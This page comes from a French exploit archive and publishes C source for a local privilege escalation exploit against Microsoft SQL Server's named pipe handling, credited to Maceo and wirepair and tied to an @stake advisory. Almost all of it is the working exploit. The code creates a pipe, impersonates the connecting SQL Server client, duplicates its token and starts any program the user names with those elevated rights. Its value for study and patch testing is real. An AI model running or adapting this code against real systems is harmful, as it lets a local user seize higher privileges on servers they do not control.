Microsoft SQL Server Named Pipe Privilege Escalation Exploit

    
 
     * Version TXT Disponible ici *
/* 
                              *  Author:  Maceo and wirepair
                              *  Modified to take advantage of CAN-2003-0496 Named Pipe Filename 
                              *  MSSQL Local Privilege Escalation Found by @stake. Use with their advisory
                              */


                              #include 
                              #include 


                              int main(int argc, char **argv)
                              {
                              char szPipe[64];
                              DWORD dwNumber = 0;
                              DWORD dwType = REG_DWORD;
                              DWORD dwSize = sizeof(DWORD);
                              DWORD dw = GetLastError();
                              HANDLE hToken, hToken2;
                              PGENERIC_MAPPING pGeneric;
                              SECURITY_ATTRIBUTES sa;
                              DWORD dwAccessDesired;
                              PACL pACL = NULL;
                              PSECURITY_DESCRIPTOR pSD = NULL;
                              STARTUPINFO si;
                              PROCESS_INFORMATION pi;


                              if (argc != 2) {
                              fprintf(stderr, "Usage: %s \nNamed Pipe Local 
                              Priv Escalation found by @stake.\n"
                                           "This code is to be used with MS-SQL exactly as 
                              outlined in their advisory\n"
                                           "All credit for this code goes to Maceo, he did a 
                              fine job.. -wire\n"
                                           "Also thanks goes to brett Moore for helping me 
                              with DuplicateTokenEx, thanks buddy guy!\n",argv[0]);
                                           exit(1);
                              }
                              memset(&si,0,sizeof(si));
                              sprintf(szPipe, "\\\\.\\pipe\\poop");

                              // create the named pipe
                              HANDLE hPipe = 0;
                              hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, 
                              PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL);
                              if (hPipe == INVALID_HANDLE_VALUE) {
                              printf ("Failed to create named pipe:\n  %s\n", 
                              szPipe);
                              return 3;
                              }
                              printf("Created Named Pipe: \\\\.\\pipe\\poop\n");

                              // setup security attribs
                              pSD = (PSECURITY_DESCRIPTOR) LocalAlloc(LPTR, 
                              SECURITY_DESCRIPTOR_MIN_LENGTH); 
                              InitializeSecurityDescriptor(pSD, 
                              SECURITY_DESCRIPTOR_REVISION);
                              SetSecurityDescriptorDacl(pSD,TRUE, pACL, FALSE); 
                              sa.nLength = sizeof (SECURITY_ATTRIBUTES);
                              sa.lpSecurityDescriptor = pSD;
                              sa.bInheritHandle = FALSE;

                              printf("Waiting for connection...\n");
                              // wait for client to connect 
                              ConnectNamedPipe (hPipe, NULL);

                              // assume the identity of the client //
                              if (!ImpersonateNamedPipeClient (hPipe)) {
                              printf ("Failed to impersonate the named pipe.\n");
                              CloseHandle(hPipe);
                              return 5;
                              }

                              if (!OpenThreadToken(GetCurrentThread(), 
                              TOKEN_ALL_ACCESS, TRUE, &hToken )) {
                              if (hToken != INVALID_HANDLE_VALUE) {
                              printf("GetLastError: %u\n", dw);
                              CloseHandle(hToken);
                              exit(0);
                              }
                              }

                              printf("Duplicating Token...\n");
                              if(DuplicateTokenEx(hToken,MAXIMUM_ALLOWED,&sa,SecurityImpersonation, 
                              TokenPrimary,&hToken2) == 0) {
                              printf("error in duplicate token\n");
                              printf("GetLastError: %u\n", dw);
                              exit(0);
                              }
                              MapGenericMask( &dwAccessDesired, pGeneric );

                              // display impersonating users name
                              dwSize  = 256;
                              char szUser[256];
                              GetUserName(szUser, &dwSize);
                              printf ("Impersonating: %s\n", szUser);

                              si.cb = sizeof(si);
                              si.lpDesktop = NULL;

                              printf("Creating New Process %s\n", argv[1]);     
                              if(!CreateProcessAsUser(hToken2, NULL, argv[1], &sa, 
                              &sa,true, NORMAL_PRIORITY_CLASS | 
                              CREATE_NEW_CONSOLE,NULL,NULL,&si, &pi)) {
                              printf("GetLastError: %u\n", dw);
                              }
                              CloseHandle(hPipe);

                              return 0;
                              }
                              
                              

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits